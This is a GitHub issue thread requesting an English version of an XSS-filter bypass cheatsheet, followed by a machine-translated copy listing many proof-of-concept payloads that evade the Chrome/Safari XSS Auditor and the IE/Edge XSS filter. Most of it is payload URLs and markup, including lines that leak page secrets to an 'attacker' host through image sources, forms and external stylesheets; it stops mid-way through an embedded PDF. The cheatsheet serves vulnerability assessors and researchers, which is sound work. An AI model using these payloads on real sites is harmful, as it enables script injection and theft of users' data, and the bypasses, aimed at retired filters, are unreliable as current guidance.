filterbypass
English version?
Hi @masatokinugawa, thanks for sharing. It's pretty neat! However, I just want to know whether you have any plan to offer an English version as well? It would be great if we could have one. 😄
Hi @qazbnm456! I am thinking that I want to provide an English version, but I haven't been able to make time so far :(
Hi @Auxy233! Please feel free to translate my cheatsheet. It's up to you, but if you can send me the English version (via the pull request?), I'll merge it and add proper credit. Thanks!
Thank you for your consideration and help, @masatokinugawa and @Auxy233. I'm looking forward to it. 😄
@Auxy233 Nice, I can't wait to see it. Really appreciate. 👍
@Auxy233 Sorry for bothering again, but is there any progress I can follow up? Still awaiting your kind work patiently.
Any progress?
Just use Google Translate for the time being. @masatokinugawa does a good job at describing the conditions and I was easily able to reproduce the bypasses.
Here is a Google-translated markdown for y'all who need it:
This page summarizes bypasses of the XSS Auditor and the XSS Filter. Only content that works on the latest versions of Chrome/Safari and IE11/Edge is listed. If you are a vulnerability assessor, use it to prove convincingly that an attack is possible; if you are a security researcher, use it to find further bypasses. What is listed here is what can be bypassed in common situations; a method not being listed does not mean it cannot be abused in a real-world situation. Whether or not the filter can be bypassed, always fix the underlying XSS.
Table of contents

- XSS Auditor
  - What is not blocked
    - XSS happening in string literals
    - XSS established by URL alone (such as when the input value is directly entered in the href part of the a tag)
    - If you have more than one injection point
    - If there is string manipulation
      - If deleted
      - If replaced
    - DOM based XSS other than document.write() of the request string
    - XSS in XML pages
    - Creating http(s): links
    - Tags that can send requests to the outside
    - Arbitrary CSS description
  - Bypass
    - Using the values attribute for SVG animations (Safari only)
    - Using multiple null characters (Safari only)
    - Using comments with --> in script tags (Safari only)
    - Using unclosed base tags (Safari only)
      - Using Flash
      - Using scripts loaded with relative URLs
    - Use of ISO-2022-JP escape sequences
    - Using resources from the same domain
      - Cases with XSS in the path (Chrome only)
      - File Upload Feature
      - Using Flash and flashvars
      - Using ExternalInterface.objectID and ExternalInterface.call() in Flash
      - Using Angular
      - Using Vue.js
      - Using jQuery
      - Using underscore.js
      - Using JSX transformation scripts such as JSXTransformer/babel-standalone
    - Using odd tags with document.write() (Chrome only)
    - Using unclosed form tags (information leakage only) (Safari only)
  - Past bypasses
- IE/Edge XSS filter
  - What is not blocked
    - XSS happening in string literals
    - All DOM based XSS
    - XSS with more than one injection point on one page
    - If there is string manipulation
      - If deleted
      - If replaced
    - Tags that can send requests to the outside
  - Bypass
    - Using strings disguised as XML namespaces (Edge only)
    - Using HZ-GB-2312 Escape Sequences
    - Using encoding behavior when navigating
    - Using the Adobe Acrobat Reader plug-in (IE only)
    - Using Content Sniffing for XML (IE only)
    - Using UTF-7 BOM (IE only)
    - Using <?PXML> (IE only)
    - Using referrers
      - Using link features within the same domain (including subdomains)
      - Bypass where an arbitrary URL can be specified
      - If the state before submission to the vulnerable form can be maintained on the page
    - Using option tags
    - Using an empty iframe
    - Using formaction (getting information only)
    - Use of character-referenced strings in style (style description only)
  - Past bypasses
XSS Auditor
What is not blocked
In contexts where protection is not provided in the first place, scripts can be executed without special manipulation.
XSS happening in string literals
https://vulnerabledoma.in/bypass/str_literal?q=%22%3Balert(1)//
<script>var q="";alert(1)//"</script>
XSS established by URL alone (such as when the input value is directly entered in the href part of the a tag)
https://vulnerabledoma.in/bypass/link?q=javascript:alert(1)
<a href="javascript:alert(1)">Link</a>
If you have more than one injection point
(Some cases involving more than one injection point do appear to be blocked, but the previously reported cases ([#96616](https://bugs.chromium.org/p/chromium/issues/detail?id=96616), #403636) are WontFix, so this is classified as not blocked.)
https://vulnerabledoma.in/bypass/text?type=2&q=%60-alert(1)%3C/script%3E%3Cscript%3E%60
<div>`-alert(1)</script><script>`</div>
<div>`-alert(1)</script><script>`</div>
If there is string manipulation
When the application removes or replaces certain strings, the filter does not block, because the string in the request no longer matches what appears in the response.
If deleted
https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E
<svg o<script>nload=alert(1)>
↓
<svg onload=alert(1)>
If replaced
https://vulnerabledoma.in/bypass/text?type=7&q=%3Cscript%3E/%26/-alert(1)%3C/script%3E
<script>/&/-alert(1)</script>
↓
<script>/&amp;/-alert(1)</script>
DOM based XSS other than document.write() of the request string
https://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E
<body>
<script>
hash=location.hash.slice(1);
document.body.innerHTML=decodeURIComponent(hash);
</script>
</body>
https://vulnerabledoma.in/bypass/dom_redirect#javascript:alert(1)
<script>
location.href=decodeURIComponent(location.hash.slice(1));
</script>
XSS in XML pages
https://vulnerabledoma.in/bypass/xml?q=%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml%22%3Ealert(1)%3C/script%3E
<?xml version="1.0"?><html><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script></html>
Bypass also occurs when a string can be written from the top of the page, the Content-Type is not specified correctly, and XML is selected by content sniffing.
https://vulnerabledoma.in/bypass/text?mime=unknown&q=%3C?xml%20version=%221.0%22?%3E%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml%22%3Ealert(1)%3C/script%3E
<?xml version="1.0"?><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
The following do not lead to script execution, but they are allowed through and can be used for attacks to some extent.
Creating http(s): links
https://vulnerabledoma.in/bypass/text?q=%3Ca%20href=https://attacker/%3ESession%20expired.%20Please%20login%20again.%3C/a%3E
<a href=https://attacker/>Session expired. Please login again.</a>
Tags that can send requests to the outside
By leaving a quote open, for example, it is sometimes possible to include sensitive page content in an outgoing request such as an image load.
https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data=
<p><img src="https://attacker/?data=</p>
<p>This is a secret text.</p>
<p id="x">AAA</p>
Arbitrary CSS description
Besides altering the appearance of the page, if the same page contains sensitive information it may be possible to extract that information using CSS alone. See the reference URLs for details.
Reference URL:
- http://www.businessinfo.co.uk/labs/talk/The_Sexy_Assassin.ppt
- https://masatokinugawa.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html
https://vulnerabledoma.in/bypass/text?q=%3Cstyle%3E@import%20%27//attacker/test.css%27%3C/style%3E
<style>@import '//attacker/test.css'</style>
https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=stylesheet%20href=//attacker/test.css%3E
<link rel=stylesheet href=//attacker/test.css>
Bypass
Using the values attribute for SVG animations (Safari only)
Conditions for attacking:
- There is XSS that can write arbitrary tags
Reference URL:
- https://bugs.chromium.org/p/chromium/issues/detail?id=709365
- https://bugs.chromium.org/p/chromium/issues/detail?id=738017
PoCs:
https://vulnerabledoma.in/bypass/text?q=%3Csvg%20xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Canimate%20xlink:href=%23x%20attributeName=%22xlink:href%22%20values=%22%26%23x3000%3Bjavascript:alert(1)%22%20/%3E%3Ca%20id=x%3E%3Crect%20width=100%20height=100%20/%3E%3C/a%3E
<svg xmlns:xlink=http://www.w3.org/1999/xlink><animate xlink:href=#x attributeName="xlink:href" values="&#x3000;javascript:alert(1)"/><a id=x><rect width=100 height=100 /></a>
Using multiple null characters (Safari only)
Conditions for attacking:
- There is XSS that can write arbitrary tags
- Null bytes are output as-is (not stripped)
- The injection point is not preceded by a whitespace character
Reference URL:
- https://twitter.com/0rbz_/status/896896095862669312
PoCs:
https://vulnerabledoma.in/bypass/text?q=%00%00%00%00%00%00%00%3Cscript%3Ealert(1)%3C/script%3E
[0x00][0x00][0x00][0x00][0x00][0x00][0x00]<script>alert(1)</script>
Using comments with --> in script tags (Safari only)
Conditions for attacking:
- There is XSS that can write arbitrary tags
- A closing </script> tag appears after the injection point, with no line break between the injection point and it
Reference URL:
- https://bugs.chromium.org/p/chromium/issues/detail?id=753307
PoCs:
https://vulnerabledoma.in/bypass/text?type=9&q=%3Cscript%3Ealert(1)%0A--%3E
<div><script>alert(1)
--></div><script src=/test.js></script>
Using unclosed base tags (Safari only)
Using Flash
Conditions for attacking:
- There is XSS that can write arbitrary tags
- There is no whitespace immediately after the injection point, or a ' or " appears somewhere after it
- Flash can be used in the target environment
Reference URL:
- https://masatokinugawa.l0.cm/2016/05/xss8.html
PoCs:
(If there is no whitespace immediately after) https://vulnerabledoma.in/bypass/text?type=3&q=%3Cembed%20allowscriptaccess=always%20src=/xss.swf%3E%3Cbase%20href=//l0.cm/
<div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>
(If there is whitespace immediately after) https://vulnerabledoma.in/bypass/text?type=4&q=%3Cembed%20allowscriptaccess=always%20src=/xss.swf%3E%3Cbase%20href=%22//l0.cm/
<div> <embed allowscriptaccess=always src=/xss.swf><base href="//l0.cm/ </div><div id="x"></div>
Using scripts loaded with relative URLs
Conditions for attacking:
- There is XSS that can write arbitrary tags
- There is no whitespace immediately after the injection point, or a ' or " appears somewhere after it
- Later in the page, a script is loaded via a relative URL
PoCs:
https://vulnerabledoma.in/bypass/text?type=9&q=%3Cbase%20href=//cors.l0.cm/
<div><base href=//cors.l0.cm/</div><script src=/test.js></script>
Use of ISO-2022-JP escape sequences
Conditions for attacking:
- There is XSS that can write arbitrary tags
- The page does not specify a character encoding
Supplement:
In ISO-2022-JP HTML, the byte sequences [0x1B](B, [0x1B](H and [0x1B](J are ignored, so inserting one of them into the middle of a string the Auditor reacts to defeats the match. Also, in Chrome/Safari a byte sequence such as [0x1B]$@[0x0A] is treated the same as [0x0A], but the XSS Auditor does not interpret it correctly, which allows a bypass.
Reference URL:
- https://bugs.chromium.org/p/chromium/issues/detail?id=114941
- https://l0.cm/encodings/test3/
PoCs:
- https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Bnload=alert(1)%3E
- https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Hnload=alert(1)%3E
- https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Jnload=alert(1)%3E
<meta charset=iso-2022-jp><svg o[0x1B](Bnload=alert(1)>
(*Because $ gets encoded automatically in links and the links then do not work as intended, the ones containing $ go through a redirect.)
- https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B$@%0A%3C/script%3E (redirect: https://tinyurl.com/l9mxds2)
- https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B$B%0A%3C/script%3E (redirect: https://tinyurl.com/ml23lh9)
- https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B(I%0A%3C/script%3E
- https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B$@%0D%3C/script%3E (redirect: https://tinyurl.com/lfks6v6)
<meta charset=iso-2022-jp><script>alert(1)[0x1B]$@[0x0A]</script>
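To make the mechanism above concrete, the following is a minimal ISO-2022-JP decoder written for this page (an added example, not code from the cheatsheet or from any browser). It models only what the section describes: ESC ( B, ESC ( H and ESC ( J switch single-byte modes without emitting anything, and a 0x0A inside the two-byte mode entered by ESC $ @ / ESC $ B is treated as a plain line break, as the text says Chrome/Safari do. It does not map real JIS X 0208 characters. The helper names (decodeIso2022Jp, bytes, rawContains, pocs, compareViews) are this example's own, and the PoC bodies are reconstructed from the text with the escape byte written as \x1b.

```javascript
// Added example for this page (not from the cheatsheet or any browser source).
// Minimal ISO-2022-JP decoder: enough to show why a check that inspects raw bytes
// and a browser that inspects decoded characters disagree about the same response.
const ESC = 0x1b;

// Decode a Uint8Array as ISO-2022-JP. Handles the escape sequences discussed in the
// text (ESC ( B, ESC ( H, ESC ( J, ESC $ @, ESC $ B). Real JIS X 0208 characters are
// not mapped; any two-byte character is emitted as U+FFFD, which is all this demo needs.
function decodeIso2022Jp(input) {
  let out = '';
  let state = 'ascii'; // 'ascii' | 'roman' (JIS X 0201) | 'jis0208' (two-byte)
  let i = 0;
  while (i < input.length) {
    const b = input[i];
    if (b === ESC) {
      const b1 = input[i + 1];
      const b2 = input[i + 2];
      if (b1 === 0x28 && b2 === 0x42) { state = 'ascii'; i += 3; continue; }                  // ESC ( B
      if (b1 === 0x28 && (b2 === 0x4a || b2 === 0x48)) { state = 'roman'; i += 3; continue; }  // ESC ( J, ESC ( H
      if (b1 === 0x24 && (b2 === 0x40 || b2 === 0x42)) { state = 'jis0208'; i += 3; continue; } // ESC $ @, ESC $ B
      out += '\ufffd'; i += 1; continue; // unknown escape: replacement character, keep going
    }
    if (state === 'jis0208') {
      // Models the behaviour the text attributes to Chrome/Safari: a bare line break
      // inside two-byte mode acts as a line break and drops back to ASCII.
      if (b === 0x0a || b === 0x0d) { state = 'ascii'; out += String.fromCharCode(b); i += 1; continue; }
      out += '\ufffd'; i += 2; continue; // lead + trail byte of a kanji we do not map
    }
    if (state === 'roman' && b === 0x5c) { out += '\u00a5'; i += 1; continue; } // JIS-Roman: yen sign
    if (state === 'roman' && b === 0x7e) { out += '\u203e'; i += 1; continue; } // JIS-Roman: overline
    out += String.fromCharCode(b); // ASCII, and the ASCII-compatible part of JIS-Roman
    i += 1;
  }
  return out;
}

// Build a byte array from a string whose characters are all <= 0xFF (ESC written as \x1b).
function bytes(s) {
  return Uint8Array.from(s, (ch) => ch.charCodeAt(0) & 0xff);
}

// What a byte-oriented check sees: does the needle occur contiguously in the raw bytes?
function rawContains(input, needle) {
  return String.fromCharCode(...input).includes(needle);
}

// The PoC bodies from this section as the server emits them (constructed here from the text).
const pocs = {
  splitByEscB: bytes('<svg o\x1b(Bnload=alert(1)>'),
  splitByEscH: bytes('<svg o\x1b(Hnload=alert(1)>'),
  splitByEscJ: bytes('<svg o\x1b(Jnload=alert(1)>'),
  newlineInKanjiMode: bytes('<script>alert(1)\x1b$@\n</script>'),
};

// Compare the raw-byte view with the decoded view for every PoC.
function compareViews() {
  const result = {};
  for (const [name, raw] of Object.entries(pocs)) {
    result[name] = {
      rawHasOnload: rawContains(raw, 'onload'),
      decoded: decodeIso2022Jp(raw),
    };
  }
  return result;
}

console.log(compareViews());
```

Running it shows that none of the raw byte strings contain the substring onload (or, for the last PoC, alert(1) directly followed by a newline and the closing tag), while every decoded string is exactly the payload the parser will execute. Any filter that compares request bytes against response bytes without first decoding in the page's charset is working on the wrong view.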
Using resources from the same domain
XSS Auditor does not block loading same-domain resources that do not have queries. Bypassing is possible in some cases if the resources necessary for an attack can be placed in the same domain.
Cases with XSS in the path (Chrome only)
Conditions for attacking:
- XSS that can write arbitrary tags is in the path
- The page can be displayed without a query string
PoCs:
https://vulnerabledoma.in/bypass/path/%3Clink%20rel=import%20href=%22%2Fbypass%2Fpath%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E%22%3E
PATH_INFO:/<link rel=import href="/bypass/path/<script>alert(1)</script>">
File Upload Feature
Conditions for attacking:
- There is XSS that can write arbitrary tags
- Hosting user-uploaded files on the same origin
PoCs:
https://vulnerabledoma.in/bypass/text?q=%3Cscript%20src=/bypass/usercontent/xss.js%3E%3C/script%3E
<script src=/bypass/usercontent/xss.js></script>
(Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/usercontent/icon.jpg%3E
<link rel=import href=/bypass/usercontent/icon.jpg>
Using Flash and flashvars
Conditions for attacking:
- There is XSS that can write arbitrary tags
- There is a Flash file on the same origin that passes an unescaped parameter string to ExternalInterface.call()
- Flash can be used in the target environment
supplement:
By using the flashvars attribute, parameters can be passed without putting them in the query string of the SWF itself. (That is, even if the Flash side restricts taking parameters from the URL as a countermeasure against XSS when the SWF is opened directly, they can still be passed via flashvars.) This can also be used to bypass a CSP such as Content-Security-Policy: default-src 'self'.
PoCs:
https://vulnerabledoma.in/bypass/text?csp=self&q=%3Cembed%20name=a%20flashvars=%27autoplay=true%26file=%22})%22)-(alert=alert(1)))}catch(e){}//%27%20allowscriptaccess=always%20src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf%3E
<embed name=a flashvars='autoplay=true&file="})\")-(alert=alert(1)))}catch(e){}//' allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>
ActionScript:
ExternalInterface.call("setTimeout", ExternalInterface.objectID + '_event' + "('" + eventName + "'," + eventValues + ")", 0);
Using ExternalInterface.objectID and ExternalInterface.call() in Flash
Conditions for attacking:
- There is XSS that can write arbitrary tags
- There is a Flash file on the same origin that passes ExternalInterface.objectID to ExternalInterface.call()
- Flash can be used in the target environment
supplement:
ExternalInterface.objectID is a property holding the value of the name attribute of the tag used to embed the SWF. It cannot cause XSS on its own, but it can be used purely for bypassing. It can also be used to bypass a CSP such as Content-Security-Policy: default-src 'self'.
PoCs:
https://vulnerabledoma.in/bypass/text?csp=self&q=%3Cembed%20name=%27alert(1)-%27%20allowscriptaccess=always%20src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf%3E
<embed name='alert(1)-' allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>
ActionScript:
ExternalInterface.call(ExternalInterface.objectID + '_init');
Using Angular
Conditions for attacking:
- There is XSS that can write arbitrary tags
- A page on the same origin that hosts Angular or loads Angular from a CORS-enabled CDN
supplement:
Angular tries to expand templates enclosed in {{ }} inside an element that has the ng-app attribute, and templates can execute script.
Reference URL:
- https://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
PoCs:
https://vulnerabledoma.in/bypass/text?q=%3Cscript%20src=%22/js/angular1.6.4.min.js%22%3E%3C/script%3E%3Cp%20ng-app%3E{{constructor.constructor(%27alert(1)%27)()}}
<script src="/js/angular1.6.4.min.js"></script><p ng-app>{{constructor.constructor('alert(1)')()}}
If there is a page on the same origin that loads Angular from a CORS-enabled CDN, resources from an external origin can be loaded indirectly through HTML Imports.
(Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=angular.html%3E%3Cp%20ng-app%3E{{constructor.constructor(%27alert(1)%27)()}}
<link rel=import href=angular.html><p ng-app>{{constructor.constructor('alert(1)')()}}
Using Vue.js
Conditions for attacking:
- There is XSS that can write arbitrary tags
- A page on the same origin that hosts Vue.js or loads from a CORS-enabled CDN
- There is a script on the page or on the same origin that performs template expansion on a specially crafted element
PoCs:
(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/vue.html%3E%3Cdiv%20id=app%3E{{constructor.constructor(%27alert(1)%27)()}}
<link rel=import href=/bypass/vue.html><div id=app>{{constructor.constructor('alert(1)')()}}
Using jQuery
Conditions for attacking:
- There is XSS that can write arbitrary tags
- A page on the same origin that hosts jQuery or loads jQuery from a CORS-enabled CDN
- There is a script on the page or on the same origin that calls one of jQuery's insertion functions on the crafted form element
supplement:
jQuery's insertion functions are after, before, prepend, append, html, replaceWith, wrap, wrapAll, insertBefore, insertAfter, prependTo, appendTo and the like. A form control whose name attribute is ownerDocument makes the reference to Node.ownerDocument resolve to the wrong object, so the script is executed where it should not be (see -scream/21). In addition, jQuery strips <!-- from the script block before executing it; combined with the fact that the Auditor does not intercept script blocks that contain only a comment, this causes the bypass.
Reference URL:
- https://sirdarckcat.github.io/csp/jquery.html
PoCs:
https://vulnerabledoma.in/bypass/text?type=5&q=%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!--alert(1)%3C/script%3E%3C/form%3E
<!DOCTYPE html>
<html>
<head>
<script src="/js/jquery-3.2.1.min.js"></script>
<script>
$(document).ready(function(){
// code taken from http://api.jquery.com/after/
$( ".container" ).after( $( ".child" ) );
});
</script>
</head>
<body>
<!-- XSS -->
<form class=child><input name=ownerDocument><script><!--alert(1)</script></form>
<!-- XSS -->
<p class="container"></p>
</body>
<!-- Inspired by @sirdarckcat CSP bypass trick: https://sirdarckcat.github.io/csp/jquery.html -->
</html>
(This example is Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/jquery.html%3E%3Cp%20class=container%3E%3C/p%3E%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!--alert(1)%3C/script%3E%3C/form%3E
<link rel=import href=/bypass/jquery.html><p class=container></p><form class=child><input name=ownerDocument><script><!--alert(1)</script></form>
Using underscore.js
Conditions for attacking:
- There is XSS that can write arbitrary tags
- A page on the same origin that hosts underscore.js or loads it from a CORS-enabled CDN
- There is a script on the page or on the same origin that performs template expansion on a specially crafted script element
PoCs:
(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/underscore.html%3E%3Cscript%20id=template%3E//%3C%25alert%601%60%25%3E%3C/script%3E
<link rel=import href=/bypass/underscore.html><script id=template>//<%alert`1`%></script>
Using JSX transformation scripts such as JSXTransformer/babel-standalone
Conditions for attacking:
- There is XSS that can write arbitrary tags
- Pages on the same origin that host JSX transformation scripts such as JSXTransformer.js or load them from a CORS-enabled CDN
supplement:
This takes advantage of the transformation script parsing SVG script blocks in the same way as HTML script blocks: the comment part between <!-- and -->, which is normally not executed, is evaluated as script.
PoCs:
(This example is for Chrome only) https://vulnerabledoma.in/bypass/text?charset=utf-8&type=1&q=%3Clink%20rel=import%20href=/bypass/babel-standalone.html%3E%3Csvg%3E%3Cscript%20type=%22text/jsx%22%3E//%3C!--%0aalert(1)//--%3E%3C/svg%3E%3Cscript%3E0%3C/script%3E
<link rel=import href=/bypass/babel-standalone.html><svg><script type=text/jsx>//<!--
alert(1)//--></svg><script>0</script>
Using odd tags with document.write() (Chrome only)
Conditions for attacking:
- There is XSS that passes the URL to document.write()
- The tag used for the attack can be closed by markup outside the document.write() (in the PoC below, </body> serves as the closing tag)
Reference URL:
- https://bugs.chromium.org/p/chromium/issues/detail?id=421786
PoCs:
https://vulnerabledoma.in/bypass/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)//
<body>
<script>
hash=location.hash.slice(1);
document.write(decodeURIComponent(hash));
</script>
</body>
Using unclosed form tags (information leakage only) (Safari only)
Conditions for attacking:
- There is XSS that can write arbitrary tags
- A new form tag can be placed so that existing form controls containing sensitive information are submitted along with it
Reference URL:
- https://bugs.chromium.org/p/chromium/issues/detail?id=719092
PoCs:
(if you are inside a form) https://vulnerabledoma.in/bypass/form?q=%22%3E%3C/form%3E%3Cform%20action=https://attacker/
<form action="form">
<input type="hidden" name="q" value=""></form><form action=https://attacker/">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>
(when outside the form) https://vulnerabledoma.in/bypass/form2?q=%3Cbutton%20form=f%3ECLICK%3Cform%20id=f%20action=https://attacker/
<div><button form=f>CLICK<form id=f action=https://attacker/</div>
<form action="form2">
<input type="hidden" name="secret" value="a09d3ef0">
</form>
Past bypasses
Posted in the Fixed Bypass Archive.
IE/Edge XSS filter
What is not blocked
XSS happening in string literals
supplement:
There used to be a blocking condition for string literals. It partially remains, but assignment to location, which used to be blocked, is now allowed and is clearly exploitable, so there is almost no protection left. Since it does not look like protection will be provided any more, I categorize this as not blocked rather than as a bypass.
https://vulnerabledoma.in/bypass/str_literal?q=%22%3Blocation='javascript\x3Aalert\x281\x29'//
<script>var q="";location='javascript\x3Aalert\x281\x29'//"</script>
All DOM based XSS
https://vulnerabledoma.in/bypass/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)%3E
<script>
hash=location.hash.slice(1);
document.write(decodeURIComponent(hash));
</script>
https://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E
<body>
<script>
hash=location.hash.slice(1);
document.body.innerHTML=decodeURIComponent(hash);
</script>
</body>
https://vulnerabledoma.in/bypass/dom_redirect#javascript:alert(1)
<script>
location.href=decodeURIComponent(location.hash.slice(1));
</script>
XSS with more than one injection point on one page
https://vulnerabledoma.in/bypass/text?type=2&q=%22src=data:,alert%25281%2529%3E%3C/script%3E%3Cscript%20x=%22
<div>"src=data:,alert%281%29></script><script x="</div>
<div>"src=data:,alert%281%29></script><script x="</div>
If there is string manipulation
When the application removes or replaces certain strings, the filter does not block, because the string in the request no longer matches what appears in the response.
If deleted
https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E
<svg o<script>nload=alert(1)>
↓
<svg onload=alert(1)>
If replaced
If a replacement occurs at a position corresponding to . in the filter's regular expression and grows the string beyond what that wildcard tolerates, the filter can no longer block.
In the following case, the behaviour of & being over-encoded (replaced more than once) is used to avoid matching the blocking condition <sc{r}ipt.*?>. / is a wildcard of 0-3 characters and & a wildcard of 0-5 characters, so the maximum width that can be covered is 8 characters. The string /&amp;amp; in the output after replacement is 10 characters, which exceeds the 8-character width, so it cannot be blocked.
PoCs:
https://vulnerabledoma.in/bypass/text?type=10&q=%3Cscript/%26%3Ealert(1)%3C/script%3E
<script/&>alert(1)</script>
↓
<script/&amp;amp;>alert(1)</script>
The following does not lead to script execution, but it is allowed through and can be used for attacks to some extent.
Tags that can send requests to the outside
By leaving a quote open, for example, it is sometimes possible to include sensitive page content in an outgoing request such as an image load.
https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data=
<p><img src="https://attacker/?data=</p>
<p>This is a secret text.</p>
<p id="x">AAA</p>
Bypass
Using strings disguised as XML namespaces (Edge only)
Conditions for attacking:
- There is XSS that can write arbitrary tags
- Flash is enabled in the target environment
- No X-XSS-Protection: 1; mode=block header
supplement:
Edge also tries to block tags that carry an XML namespace prefix. If a string such as <embed/:script is used in ordinary HTML, the filter treats it as a script tag even though the browser interprets it as an embed tag, and the blocking fails. Since a blocking action does take place, the bypass fails if the X-XSS-Protection: 1; mode=block header is present.
Reference URL:
- https://masatokinugawa.l0.cm/2016/12/xss9.html
PoCs:
https://vulnerabledoma.in/bypass/text?q=%3Cembed/:script%20allowscriptaccess=always%20src=//l0.cm/xss.swf%3E
<embed/:script allowscriptaccess=always src=//l0.cm/xss.swf>
Using HZ-GB-2312 Escape Sequences
Conditions for attacking:
- There is XSS that can write arbitrary tags
- The Content-Type header does not specify a charset
Reference URL:
- https://masatokinugawa.l0.cm/2015/09/xss7.html
PoCs:
https://vulnerabledoma.in/bypass/text?q=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a
<x~
onfocus=alert(1) id=a tabindex=0>
Using encoding behavior when navigating
Conditions for attacking:
- Reflected XSS via GET
supplement:
When navigating, IE/Edge encodes the query string using the character encoding of the page performing the navigation and sends the request in that encoding. The XSS filter appears to check the string it encoded itself rather than the request actually sent, so when the two differ, the mismatch between the encoded string and the bytes on the wire allows a bypass.
A concrete example uses the x-chinese-cns encoding, as in the PoC below. In x-chinese-cns the character ??。 is mapped to 0xA13E. If a query containing <script/??。 is sent, as the value of a reflected XSS parameter, from a page whose encoding is x-chinese-cns, the request does not carry the UTF-8 representation of ??。 but the x-chinese-cns bytes, so the page ends up containing the bytes <script/ 0xA1 0x3E (0x3E is >), that is, a <script> tag. Normally writing a <script> tag would trigger the XSS filter, but it does not here; presumably the filter saw the string <script/??。 and found that it did not match the blocking condition <sc{r}ipt.*?>.
Reference URL:
- https://masatokinugawa.l0.cm/2017/05/xss14.html
PoCs:
- https://l0.cm/bypass/ie_x-chinese-cns_text.html
<meta charset=utf-8>
<script>
document.charset="x-chinese-cns";
location="https://vulnerabledoma.in/bypass/text?q=<script/??。alert(1)<\/script/"
</script>
(For XSS with attribute value only) https://l0.cm/bypass/ie_x-chinese-cns_attribute.html
<meta charset=utf-8>
<script>
document.charset="x-chinese-cns";
location="https://vulnerabledoma.in/bypass/attribute?q=?ケ?onmouseover=alert(1)//"
</script>
As with other character encodings, a mismatch between the encoded string and the bytes actually sent allows a bypass.
- https://l0.cm/bypass/ie_hz_text.html
- https://l0.cm/bypass/ie_hz_attribute.html
- https://l0.cm/bypass/ie_iso2022jp_text.html
- https://l0.cm/bypass/ie_iso2022jp_attribute.html
(The following reproduce in an environment whose system locale is Japanese, but did not reproduce in an environment with German. The operating principle seems to differ slightly from the other vectors, but I do not know the exact principle. Published for reference.)
- https://l0.cm/bypass/ie_0xff_text.html
- https://l0.cm/bypass/ie_0xff_attribute.html
Using the Adobe Acrobat Reader plug-in (IE only)
Conditions for attacking:
- There is XSS via POST request
- Target uses Adobe Acrobat Reader plugin
Reference URL:
- https://insert-script.blogspot.com/2017/01/complete-internet-explorer-xss-filter.html
PoCs:
https://l0.cm/bypass/ie_postxss_bypass.pdf
%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 33 0 R
/AcroForm 22 0 R
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Annots [23 0 R]
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources <<
/ProcSet [/PDF /Text]
/Font << /F1 6 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 56 >>
stream
BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET
endstream
endobj
6 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj
33 0 obj
<<
/S /SubmitForm
/F
<<
%URL TO SUBMIT TO:
/F (https://vulnerabledoma.in/bypass/text)
/FS /URL
>>
% SPECIFIES THE FORMAT AND OTHER FORM RELATED CONFIGURATION
/Flags 6
>>
endobj
22 0 obj
<<
/Fields [23 0 R]
>>
endobj
23 0 obj
<<
